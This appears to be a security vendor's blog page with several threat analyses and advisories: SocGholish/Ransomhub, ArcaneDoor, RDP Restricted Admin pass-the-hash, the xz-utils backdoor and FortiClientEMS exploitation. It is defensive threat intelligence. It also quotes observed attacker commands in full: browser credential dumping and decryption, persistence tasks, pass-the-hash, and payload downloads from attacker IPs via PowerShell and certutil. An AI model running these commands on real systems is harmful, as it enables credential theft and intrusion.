- Product
Product Overview
Sophisticated security with unmatched simplicityCloud SIEM
Pre-configured detections across your environmentHoneypots
Deception technology to detect lateral movementEndpoint Visibility
Real-time monitoring with added detection & responseSecurity Reports
Data visualizations, compliance reports, and executive summariesAutomated Response
Detect, prioritize, and neutralize threats around the clockIntegrations
Cloud, on-prem, and open API connectionsXDR Platform
A complete view to identify risk, and things operational
- Pricing
- Why Blumira
Why Blumira
The Security Operations platform IT teams loveWatch A Demo
See Blumira in action and how it builds operational resilienceUse Cases
A unified security solution for every challengePricing
Unlimited data and predictable pricing structureCompany
Our human-centered approach to cybersecurityCompare Blumira
Find out how Blumira stacks up to similar security toolsIntegrations
Cloud, on-prem, and open API connectionsCustomer Stories
Learn how others like you found success with Blumira
- Solutions
- Partners
- Resources
Medium
You may be familiar with SocGholish (MITRE S1124), a malicious fake browser update used to spread malware through javascript downloads. Blumira has been following this malware for some time, and this walkthrough is a summary of our recent observations based on detections and logs from our agent on a single lab device.
Overview & Background
Starting early in 2025, we started to see a recurrence of suspicious file executions. These were the outcome of users downloading fake updates from websites that have been compromised, silently leading to an attacker gaining initial access. When users downloaded and executed these fake updates, they unknowingly launched malware on their systems. Fortunately, we observed several customers whose layered security measures automatically intercepted and blocked these attacks, halting any further exploitation. One particularly notable exploit caught our attention: after installation, it remained dormant for a brief period before exhibiting clear indicators of early-stage ransomware activity. Thankfully, all organizations that we observed in these cases were promptly alerted and able to respond in a timely and effective manner to contain and eradicate the attackers. Soon after reviewing the attack chains, the exploit observed seemed to be very similar to a new campaign of SocGholish malware leading to Ransomhub ransomware execution.
SocGholish has been active since 2017 and is operated by the initial access broker (IAB) Mustard Tempest (TA569). The malware has been pretty extensively documented as it has evolved over time. The use of “watering hole” (drive-by-compromise) attacks for initial access has been very effective, making it a popular malware. Many users never even realize they downloaded fake updates from a compromised website. In fact, the Center for Internet Security noted that it was observed as the top malware in Q4 of 2024 (CIS Blog).
Identifying the Attack
Initially, we observed malicious JavaScript executions (MITRE T1059.007) containing SocGholish payloads. Our detections generated findings based on known suspicious file executions that alerted on the JavaScript files’ behaviors, allowing customers to take quick action to the infections before spreading. These files didn’t show as malicious when checked against VirusTotal at the time of the alerts but were communicating with a “.top” domain and known malicious IP infrastructure. Companies that had additional controls like DNS filtering in place had quick and often automated response actions for these initial access attacks: files were either killed/quarantined or the communicating domains were blocked immediately. This allowed customers to respond with some peace of mind.
The first interesting observation was that this file was an ‘Update[.]js’ download (similar to the file names previously observed), but it was obfuscated as a homoglyph attack (the raw filename actually reads as ‘Updаte.js’). Homoglyph attacks use special characters (or visually-similar characters from other languages) to spoof text that appears normal to human readers, while bypassing security filters that might otherwise trigger an alert/response (VirusTotal Link). Additionally, this file has a reputation of utilizing “long sleeps,” which is a way that malware avoids sandboxing and evades antivirus. Essentially, it is a delayed activation (lying dormant) for a period of time before beginning to carry out any objectives.
In this case, the alert was closed as benign. About 18 hours later, additional suspicious activity started generating alerts on the same host. This delay lines up with the “long sleeps” tactic, and after this dormancy, reconnaissance activity began. Alerts for ADFind (MITRE T1087.002) and Nltest (MITRE T1482) were promptly triggered, minutes apart on the same host. These sequential alerts signaled an evolving attack chain and promptly notified the customer, who isolated the compromised host and took response measures before any data exfiltration or ransomware execution could occur. This rapid intervention and mitigation were crucial in preventing a potentially devastating breach.
We observed additional maneuvers following the ADFind and Nltest activity that were particularly interesting. There was a new communicating domain (VirusTotal Link) not yet seen like the “.top” domains. We then saw Network Connections via pythonw.exe downloaded, unpacked to and executed from the ProgramData folder. These connections communicated with the now-known Ransomhub Python C2 Infrastructure (VT IP Link), which, at the time of this exploit, did have malicious reputations on VirusTotal. Amidst this activity, PowerShell commands ran that first created scheduled tasks for persistence and then attempted to dump and decrypt credentials from browsers, saving them to a rad<5-hex-chars>.tmp file (MITRE Link).
In their Threat Detection Report, RedCanary noted a specific "activity cluster" that involved SocGholish intrusions leading to Ransomhub activity. The attack chain is incredibly similar to what is reported in this TrendMicro article that was published after this particular attack. This additional "activity cluster" also noted credential harvesting via NTLM hashes, using a PowerShell command that looks for Outlook signature files and adds HTML code, including a link to an image file hosted in the attacker's infrastructure (NCC Group Article Link). According to RedCanary, "Once in place, when someone opens an email from the affected user...the recipient's email client may attempt to authenticate to the adversary infrastructure...enabling the adversary to harvest hashed credentials." A PowerShell command was also observed (MITRE T1187) related to this forced authentication/credential harvesting through Outlook.
Aligning with threat intelligence on SocGholish, each of these attacks spanned different industries. An initial access broker targeting a wide variety of sectors, accounting for over half of the observed malware in the last quarter, seems to be teaming up with a young though already notorious ransomware group. As threat actors evolve, details like these help inform detection development and improve security postures. Shortly after observing this last set of alerts, TrendMicro released their report, which documents the same attack chain as it worsened for victims, attributing the escalated activity to Ransomhub Ransomware. Thankfully, customers for whom we observed this activity did not experience this same ending due to either Blumira detections and alerts or layered security controls that were in place.
Commands Observed
Outlook Signature File Manipulation:
"C:\Windows\System32\cmd.exe" /C powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object {$content = Get-Content -Raw $_.FullName; $updatedContent = $content -replace '', '
'; Set-Content -Path $_.FullName -Value $updatedContent}" > "C:\Users\\AppData\Local\Temp\rad862D0.tmp"
Python Setup and Scheduled Task Creation:
powershell -c "Expand-Archive -LiteralPath c:\programdata\python3.12.zip -DestinationPath c:\programdata;ls c:\programdata\python3.12" "C:\Windows\System32\cmd.exe" /C powershell -c "$randomName='Task_' + ([guid]::NewGuid().ToString().Substring(0,8)); $a=New-ScheduledTaskAction -WorkingDirectory 'c:\programdata\python3.12' -Execute 'pythonw.exe'; $t=New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s=New-ScheduledTaskSettingsSet -DontStopIfGoingOnBatteries -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries; Register-ScheduledTask -TaskName $randomName -Action $a -Trigger $t -Settings $s" > "C:\Users\\AppData\Local\Temp\rad72663.tmp"
Browser Credential Access:
"C:\Windows\System32\cmd.exe" /C powershell -c cat \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*\\logins.json\" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Google\Chrome\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\microsoft\\edge\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Google\Chrome\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
MITRE ATT&CK Tactics and Techniques
Initial Access [TA0001]
- Drive-by Compromise [T1189]
Execution [TA0002]
- Command and Scripting Interpreter [T1059]
- JavaScript [T1059.007]
Persistence [TA0003]
- Scheduled Task/Job [T1053]
- Scheduled Task [T1053.005]
* Defense Evasion [TA0005] (This was inferred through VirusTotal reputations, not directly observed via malware analysis.)
- Virtualization/Sandbox Evasion [T1497]
- Time Based Evasion [T1497.003]
Credential Access [TA0006]
- Credentials from Password Stores [T1555]
- Credentials from Web Browsers [T1555.003]
- Forced Authentication [T1187]
Discovery [TA0007]
- Account Discovery [T1087]
- Domain Account [T1087.002]
- System Information Discovery [T1082]
Command and Control [TA0011]
- Application Layer Protocol [T1071]
- Web Protocols [T1071.001]
IOC list:
nazblog[.]top
nfwatches[.]top
cpanel[.]kreativelife[.]net
fesovalle[.]com/<redacted_filename>[.]jpeg
98[.]142[.]240[.]181
88[.]119[.]175[.]65
128[.]254[.]146[.]183
7625239d327caa956a2c11fb27d93fd3f56941c32c7bb4883f305c4577375335
4fa24b93e7895de715cddfcb5bfbe97df768b554bb4d4529283758ae92b6e86f
- https://www.virustotal.com/gui/file/4fa24b93e7895de715cddfcb5bfbe97df768b554bb4d4529283758ae92b6e86f
C123b36e36b83ffb33e5092a6e13df1b05edc89ac58462ad728d93369d1c8400
Critical
Update 4.29.24 3:37PM ET:
One new detection and one new global report have been released to track ArcaneDoor activity.
Detection: Cisco ASA: ArcaneDoor IOC IP Addresses
- This detection monitors ASA system and traffic logs for connections to IP addresses called out in this article from Cisco Talos.
- This detection is in the process of being deployed to all of our customers sending Cisco ASA logs. This is a default enabled detection.
Report: Cisco ASA: ArcaneDoor Activity Audit
- This global report presents audit events with the specific logcodes called out in this article from the Canadian Center for Cyber Security.
I also wanted to specifically call out that the existing detection, "Cisco ASA: Excessive Authentication Errors" may help identify brute forcing and password spraying against these devices. This is a default disable detection, so you will need to enable this in your Blumira tenant if not already done so.
What Happened?
On April 24th, 2024, Cisco disclosed that a state-sponsored hacking group, dubbed "ArcaneDoor," has been actively exploiting three zero-day vulnerabilities in Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023. The group has been targeting government networks worldwide, focusing on espionage and gaining in-depth knowledge of the compromised devices. While the attack vector used to provide attackers initial access remains unknown, Cisco has provided details on the specific vulnerabilities used during the hacking group’s campaign.
How Bad is This?
The ArcaneDoor hacking group has been observed exploiting three zero-day vulnerabilities, CVE-2024-20353, CVE-2024-20358, and CVE-2024-20359 in Cisco ASA and FTD firewalls. They used these vulnerabilities in conjunction with two custom-built tools, "Line Dancer" and "Line Runner," to gain unauthorized access, disable logging, exfiltrate captured packets, and execute arbitrary code on the compromised devices.
The group's primary objectives appear to be espionage and gaining in-depth knowledge of the targeted devices. They exfiltrated device configuration files, disabled syslog services to cover their tracks, and modified AAA configurations to allow their own devices access to the network.
Severity of the CVEs:
- CVE-2024-20353 (HIGH): This vulnerability in the management and VPN web servers could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.
- CVE-2024-20359 (HIGH): This vulnerability allows for executing arbitrary code with root-level privileges. The injected code could potentially persist across device reboots, elevating the severity of this vulnerability.
- CVE-2024-20358 (MEDIUM): Similar to CVE-2024-20359, this vulnerability allows for executing arbitrary code with root-level privileges but is unable to persist through reboots.
What Should I Do?
To mitigate the risk posed by these vulnerabilities, administrators should take the following actions:
- Patch affected devices as soon as possible. Cisco has released software updates that address these vulnerabilities.
- Configure logging to a central, secure location to detect and monitor any suspicious activities.
- Implement Multi-Factor Authentication (MFA) to prevent unauthorized access.
- Monitor systems for unscheduled reboots, unauthorized configuration changes, and suspicious credential activity.
- Verify the integrity of ASA and FTD devices using the instructions provided by Cisco in their official advisory.
The ArcaneDoor hacking group's exploitation of zero-day vulnerabilities in Cisco ASA and FTD firewalls highlights the importance of timely patching and maintaining a robust security posture. Administrators should prioritize patching affected devices, implement secure logging and monitoring practices, and follow Cisco's guidance to ensure the integrity of their networks.
For additional information refer to these resources:
- Canadian Centre for Cyber Security: Cyber Activity Impacting CISCO ASA VPNs
- Cisco Event Response: Attacks Against Cisco Firewall Platforms
- Cisco Talos: ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices
- Cisco Official Advisory: CVE-2024-20353
- Cisco Official Advisory: CVE-2024-20358
- Cisco Official Advisory: CVE-2024-20359
How Blumira Can Help
Blumira continues to actively monitor this issue, and look for ways that we can detect any stage of exploitation of these vulnerabilities.
If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.
Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Low
RestrictedAdmin mode for RDP was first introduced to Windows 8.1 and Windows Server 2012 R2. Restricted Admin mode has been back ported to Windows 7 and Windows Server 2008, however, it was later disabled by default on newer Windows systems. While Restricted Admin mode was created to help protect administrative account credentials against Pass-the-Hash attacks, ironically, the security control resulted in a new Pass-the-Hash vector.
The intention behind Restricted Admin mode was to mitigate the risk of exposing administrative credentials when connecting to potentially compromised machines. Normally, when you logon via RDP using an interactive session (username and password), a copy of your credentials is stored in the Local Security Authority Subsystem Service (LSASS) on the destination host.
When Restricted Admin mode is enabled, the RDP server uses network logon instead of interactive logon. This means a user with local administrator privileges on a system with Restricted Admin mode enabled authenticates with a NT hash or Kerberos ticket, instead of with a password. While the password isn’t cached, these NT hashes are and can be collected and used to impersonate users.
Restricted Admin Mode Adversarial Techniques
Because Restricted Admin mode is typically disabled by default, threat actors have been observed enabling Restricted Admin mode in order dump hashed user credentials stored in memory. Restricted Admin mode may also be enabled in order to bypass MFA solutions for RDP. [7] [2]
Once a threat actor has access to a compromised endpoint, hashed credentials can be trivially extracted from the Security Account Manager (SAM) registry file or dumped from LSASS using open-source offensive security tools. For instance, hashes can be dumped from an open session to a compromised host using the hashdump command in the meterpreter tool:
or dump NT hashes from LSASS by using mimikatz:
After the hash is collected, the NT hash of an account in an administrative group can be used to move laterally or issue commands remotely. For example, a threat actor could use xfreerdp [9]:
xfreerdp /v:IP_ADDRESS /u:USERNAME /pth:NT_HASHor mimikatz to perform a pass-the-hash attack to move laterally via RDP using a host with Restricted Admin mode enabled. [6]
Here are a few examples of recent intrusions where an attacker enabled Restricted Admin mode by disabling the DisableRestrictedAdmin registry key. The DFIR Report published a write-up on an intrusion from February 2023 weaponizing Restricted Admin mode. [3]
reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0CISA has multiple cybersecurity advisories reporting Restricted Admin mode similarly weaponized. These include groups such as Russian Foreign Intelligence Service (SVR) in December 2023 [4] and multiple nation-state threat actors in September 2023 [5].
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /fpowershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -ForceDefensive Security Controls and Blumira Detection
Remote Admin mode is generally not recommended for most workstations and is disabled by default. However, there are unique circumstances where Microsoft does recommend enabling Remote Admin, such as specific helpdesk support scenarios:
For helpdesk support scenarios in which personnel require administrative access via Remote Desktop sessions, it isn't recommended the use of Remote Credential Guard. If an RDP session is initiated to an already compromised client, the attacker could use that open channel to create sessions on the user's behalf. The attacker can access any of the user's resources for a limited time after the session disconnects.
We recommend using Restricted Admin mode option instead. For helpdesk support scenarios, RDP connections should only be initiated using the /RestrictedAdmin switch. This helps to ensure that credentials and other user resources aren't exposed to compromised remote hosts.
If you’d like to learn more about Restricted Admin best use cases and compare it to other Microsoft features check out documentation from Microsoft linked here: Remote Credential Guard | Compare Remote Credential Guard with other connection options. RestrictedAdmin mode is available for the following systems: “Windows 7, Windows 8, Windows 8.1, Windows 10, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows RT“. [8]
Blumira detects the adversarial techniques reported by CISA and The DFIR Report with a "Registry Value Tampering: Restricted Admin Mode Enabled" detection. Blumira detections also monitor for related threat actor activities that may occur before or after this activity, such as discovery, credential access, persistence, and exploit execution. Some of these detections include:
- Nltest Domain Enumeration
- Mimikatz Pass the Hash
- Password Dumper Remote Thread in LSASS
- COMSPEC Service Execution
- User Added to Local Administrator Group
- and more…
REFERENCES
[1] https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)#restricted-admin-mode-for-remote-desktop-connection
[2] https://duo.com/docs/rdp-faq#what-logon-interfaces-can-duo-protect?
[3] https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/
[4] https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
[5] https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a
[6] https://hunter2.gitbook.io/darthsidious/getting-started/intro-to-windows-hashes
[7] https://www.aon.com/cyber-solutions/aon_cyber_labs/restricted-admin-mode-circumventing-mfa-on-rdp-logons/
[8] https://learn.microsoft.com/en-us/archive/technet-wiki/32905.remote-desktop-services-enable-restricted-admin-mode
[9] https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
Critical
We will continue to provide updates as more information becomes available.
Update - 2024-04-03 12:15 ET: Added information around Jia Tan persona theories.
Update - 2024-04-19 17:25 ET: Updated GitHub information; exploit trigger on specific private key.
Update - 2024-04-03 12:15 ET: Added information around Jia Tan persona theories.
Update - 2024-04-19 17:25 ET: Updated GitHub information; exploit trigger on specific private key.
This article is divided into two sections: an Executive Summary and Technical Details. The Executive Summary provides a high-level overview of the CVE (Common Vulnerabilities and Exposures) and recommends immediate actions to take. For practitioners seeking more in-depth, low-level context, the Technical Details section offers additional information.
Executive Summary
What Happened?
The xz-utils package, versions 5.6.0 and 5.6.1, has been identified as containing a backdoor in a compromised library dependency liblzma5. The presence of the backdoor potentially allows unauthorized access to affected systems through the manipulation of the sshd authentication process. This issue has been assigned CVE-2024-3094 and given a CVSS severity score of 10.0 Critical.
"Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library"
Source: NIST
How Bad is This?
xz-utils is a XZ-format compression utility widely used across Linux distributions. The severity of the vulnerability could have posed a major threat, especially to Debian and Red Hat Linux based distributions. Fortunately, the backdoor was identified and reported by software engineer Andres Freund shortly after it was introduced into a small number of bleeding-edge Linux distributions, limiting potential impact.
While the impact was limited, affected systems are at critical risk. The vulnerability may allow a threat actor to compromise a system by sending a maliciously crafted payload to the SSH daemon (sshd). This payload could potentially grant unauthorized access to the targeted system.
The following versions of xz-util are impacted:
- 5.6.0
- 5.6.1
The following Linux distributions are affected:
- Fedora Linux 40
- Fedora Rawhide
- Debian Unstable (Sid)
- openSUSE Tumbleweed
- openSUSE MicroOS
- Kali Linux
- Arch Linux
The following stable Linux distributions have reported they are not affected:
- Alpine Linux
- Amazon Linux
- FreeBSD
- Gentoo Linux
- Linux Mint
- Red Hat Enterprise Linux (RHEL)
- SUSE Linux Enterprise and Leap
- Ubuntu*
*Note: Blumira Sensors are not affected.
What Should I Do?
System administrators are advised to immediately patch affected systems to mitigate this security risk, prioritizing those systems with publicly accessible SSH. The xz-utils 5.6.0 and 5.6.1 packages are considered untrustworthy. It is recommended to promptly apply package manager updates across all Linux and macOS systems to upgrade to trusted versions of xz-utils (i.e., versions before 5.6.0).
If you are using any affected systems in production, be sure to consult the guidance provided by the respective Linux Distribution. Continue to monitor impacted systems for unusual SSH activity.
Systems administrators can check the current version of xz-utils using the following command shared by @Kostastsale on Twitter:
for xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings "$xz_p" | grep "xz (XZ Utils)" || echo "No match found for $xz_p"; doneTechnical Details
On Friday, March 29th 2024 Andres Freund sent an email to an open-source security (oss-security) mailing list to share with Open Source projects, distributors, researchers, and developers that they had found a backdoor in the liblzma library included in the xz-utils tarball used by their Debian sid systems. They discovered the backdoor after noticing SSH logins were using more CPU and generating valgrind errors. The email was also shared by Freund via Mastodon Social as well.
Freund first reported the issue to Debian's security team. They then reported the issue to the operating system distribution security contacts list (distros@) used by the oss-security mailing list. CISA was notified by one of the distributions. Red Hat later assigned the issue CVE-2024-3094. Finally the vulnerability was shared with the open-source security mailing list.
You can read more about the oss-security Mailing List Charter here. The list of the Linux distros included in the distros@ mailing group can be reviewed here.
Freund describes that one portion of the backdoor is in the distributed tarball for xz-utils versions 5.6.0 and 5.6.1. They point to a line of code for the xz-utils debian unstable branch that injects an obfuscated script to be executed at the end of xz-util configure. If the preconditions are met, the script modifies the liblzma makefile to insert the backdoor code.
The compromised files that contain most of the exploit are located at paths:
tests/files/bad-3-corrupt_lzma2.xz
tests/files/good-large_compressed.lzmaFreund writes these files were initially added in 5.6.0 but are not actually used in any tests. He goes on to point out that the injected code caused valgrind errors (a debugging and profiling tool suite) and crashes in some configurations. Additional commits are seen in in xz-utils verson 5.6.1 that attempt to workaround these errors, including an adjusted exploit code.
Freund goes on to explain that logins with ssh became a lot slower once liblzma was backdoored. They reference before and after timestamps, namely a login that previously took 0.299 seconds now took 0.807 seconds. He writes, "openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma." From this we can better understand how the compromized liblzma library can result in unauthenticated access to a system via the sshd daemon used by SSH.
Finally, Freund describes their analysis of the compromised code in granular detail. Ultimately, the malicious code modified ifunc resolvers that are resolved during startup resulting in a modified sshd authentication process. The login slowdown is attributed to symbols being parsed in memory, notably liblzma's symbols being parsed before the main sshd binary. Another notable characteristic is the injected code appears to wait for the RSA_public_decrypt symbol in order to modify it so that it redirects to the backdoor code.
Freund confirms that when they attempted to login with a public key they observed the exploit code execute and then normal authentication processes resume. Freund hypothesizes, "I have not yet analyzed precisely what is being checked for in the injected code, to allow unauthorized access. Since this is running in a pre-authentication context, it seems likely to allow some form of access or other form of remote code execution." He then urges any vulnerable systems be upgraded immediately.
Brief History on Git Commits and Lobbying for Distribution
We should avoid speculation on the open-source maintainers involved in the project. Open-source contributors generously provide libraries that are widely used in software and operating systems, often without compensation. Their work is altruistic, built on collaboration, and countless hours of dedication. To pass judgement against open-source contributors is not an effective use of our time and will do little to secure our systems. Law enforcement is better equipped to identify and hold accountable those responsible for any malicious actions.
This all being said, examining the facts around how a popular open-source utility got backdoored and very nearly made its way into major Linux distributions serves as a valuable cautionary tale. By understanding the details of this incident, we can better protect against future supply-chain attacks targeting open-source code and the critical infrastructure that relies upon it.
The backdoored xz-util tarballs were signed by Jia Tan (JiaT75). JiaT75 is also the author of the exploit code introduced in 5.6.0 and updated in 5.6.1. It is noted there is growing speculation that Jia Tan could potentially be a persona used by group of people, potentially a nation-state sponsored team.
Timeline Overview
From 2005 to 2008 Lasse Collins along with a small group of developers work to create the XZ file format that uses the LZMA compression algorithm. Over time the format becomes popular and is used to efficiently compress things like tar files and Linux kernel images.
2021-10-29: JiaT75 sends their first patch to the xz-devel mailing list.
2022-05-19: Lasse Collins responds to an email complaint apologizing for slow response and shares that they may being handing off responsibilities to Jia Tan in an effort to better support xz-utils maintainence and response times.
2022-11-30: Jia Tan is officially identified by Lasse Collin as a xz-utils maintainer.
2023-06-22: The hook used by the backdoor is introduced by user Hans Jansen. It is speculated that this account is not a real user because the account returns later to promote the backdoored xz-utils versions and otherwise does not exist on the internet.
2023-07-07: A suspicious commit is made by JiaT75 to a popular fuzzing library oss-fuzz to disable ifunc support that would help prevent the exploit from being discovered.
2024-02-23: JiaT75 merges the backdoor code inside "test" files.
2024-02-24: xz-utils v5.6.0 is released.
2024-02-26: xz-utils v5.6.0 is added to Debian unstable.
2024-03-08: JiaT75 commits updates to the exploit to fix valgrind errors showing up in unstable Debian and beta Red Hat distributions.
2024-03-09: JiaT75 publishes xz-utils v5.6.1.
2023-03-24: JiaT75 removes details around vulnerability reporting from the SECURITY.md file typically used by researchers to provide vulnerability report guidance.
2024-03-25: Hans Jansen returns to advocate for an xz-utils update to v5.6.1 in Debian.
2023-03-28: JiaT75 advocates for xz-utils update to v5.6.1 in Ubuntu.
2024-03-29: Andres Freund discloses the vulnerability to Debian and the oss-security distros@ distribution list at OpenWall. RedHat issues CVE-2024-3094
Response from xz-utils maintainer
In response to CVE-2024-3094 GitHub has disabled the xz-utils repository. The GitHub accounts for Jia Tan (JiaT75) and Lasse Collin (Larhzu)* have been suspended, as reported by Lasse Collin in a post on The Tukaani Project site last updated at 2024-04-02 21:44:17 +0300.
* UPDATE - 2024-04-19: Lasse Collin's GitHub account and the GitHub page for xz have been reinstated.
Lasse Collin, who has maintained xz-utils since around 2009, shared that they plan to write an article on how the backdoor got into the releases and what can be learned from the situation. You can read more updates from Collin in post linked here.
Response from the Security Community
It is still early days into a complex vulnerability that made its way to bleeding-edge Linux distributions. The security community is continuing to analyze the backdoor. We can expect additional details to become available in the coming weeks. As major details are discovered this article will be updated accordingly.
UPDATE - 2024-04-19: In order to utilize the backdoor a specific private key must be used to authenticate to sshd that has been compromised by the backdoored liblzma library.
So far researchers have reported that successful exploitation does not generate any log entries (reported here and here). Consequently, the public detections made available for this vulnerability so far take a vulnerability management approach by identifying outdated liblzma library versions 5.6.0 and 5.6.1 being run by sshd. This would not detect successful exploitation, but rather identify an asset that is vulnerable to CVE-2024-3094.
Security researchers are asking themselves if there are other libraries that may have or could be compromised in a similar manner, and if that were to happen how could one identify them.
If you'd like to read more about this vulnerability in greater detail, check out the following blog posts and articles around CVE-2024-3094:
- The original report by Andres Freund
- A post from the xz-utils maintainer Lasse Collin
- A low-level FAQ by thesamesame, a gentoo developer
- A timeline of the xz-utils backdoor attack by Russ Cox
- Another timeline and OSINT commentary by Evan Boehs
Recreating the Vulnerability in a Test Environment
The following guides, tools, and repositories are available if you'd like to explore the CVE in a lab setting:
- The original report by Andres Freund
- The compromised tarballs have been preserved on Internet Archive's WayBack Machine.
- Kali Linux has published a getting started guide
- xzbot demo repository by amlweems
How Blumira Can Help
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.
Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.
Critical
Update 4.1.24 - Blumira has observed active exploitation of this vulnerability in the wild. The following indicators have been observed spawning from the sqlserver.exe process.
Finger.exe: "C:\Windows\system32\cmd.exe" /c FINGER ADMIN@185.56.83[.]82
PowerShell: "C:\Windows\system32\cmd.exe" /c powershell -nop -c $ds = 'D' + 'Own' + 'LOa'' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('http://95.179.241[.]10:23963/Bin/ConnectWiseControl.ClientSetup.msi?e=Access&y=Guest', 'c:\windows\temp\m.msi')
Certutil: certutil -f -urlcache https://ursketz[.]com/bin/bander.msi c:\windows\temp\x.msi
The following default-enabled Blumira detections will trigger if any of these activities are observed in your environment:
- Suspicious Invocation of Finger.exe
- MSSQL XP_CMDSHELL Usage
- Certutil Download
Indicators of Compromise
185.56.83[.]8295.179.241[.]10ursketz[.]com
What Happened?
Fortinet disclosed a critical vulnerability (FG-IR-24-007) on March 12, 2024, which has been identified in the FortiClient Enterprise Management Server (FortiClientEMS). FortiClientEMS is a product designed for centralized management of endpoints within an organization's network, offering a broad suite of security and management features. This is an SQL injection flaw that could allow an unauthenticated, remote attacker to execute arbitrary code through specially crafted requests.
How Bad is This?
RISK rating is Very High.
SQL injection is a common attack vector that exploits vulnerabilities in an application's software coding to manipulate backend databases. It allows attackers to insert or "inject" malicious SQL queries into input fields, which can then be executed by the database.
This specific vulnerability allows an unauthenticated, remote attacker to perform SQL injection attacks against the DAS (Database Access Service) component of FortiClientEMS. This SQL injection allows the attacker to execute remote commands using the “deprecated”, built-in xp_cmdshell function in MSSQL. Even when disabled, it is trivial to re-enable with the right SQL commands and should be carefully monitored. The exploitation of such a vulnerability could allow attackers to bypass authentication mechanisms, retrieve or alter sensitive data from the database, and potentially compromise the entire system or network by escalating privileges or deploying further malicious payloads.
Fortinet confirmed that exploitation of this vulnerability had been observed in the wild as of March 21, 2024. This is particularly concerning given the history of Fortinet devices being targeted by various threat actors, including advanced persistent threat (APT) groups and ransomware operators. These actors have exploited vulnerabilities in Fortinet devices in the past, emphasizing the importance of promptly addressing known vulnerabilities.
What Should I Do?
1. Immediately patch these affected FortiClientEMS versions:
- 7.2.0 through 7.2.2
- 7.0.1 through 7.0.10
2. If your Blumira account supports logging with Blumira Agent or Sysmon, ensure that you are sending logs from your FortiClientEMS SQL server and that the “MSSQL XP_CMDSHELL Usage” detection rule is enabled (Settings > Detection Rules).
No Action Needed
If you have the following updated versions, no action is needed:
- 7.2.3 or above
- 7.0.11 or above
How Blumira Can Help
Blumira continues to actively monitor this issue, and look for ways that we can detect any stage of exploitation of these vulnerabilities. If you use FortiEMS, and yet you are not sending those logs to Blumira, we highly recommend it.
Please see below for a full list of global reports specific to Fortigate:
CIS Controls - Firewall Configuration Change (Fortigate)
CIS Controls - IDS/IPS Alerts (Fortigate)
CIS Controls - VPN Connections (Fortigate)
CMMC - Firewall Configuration Change (Fortigate)
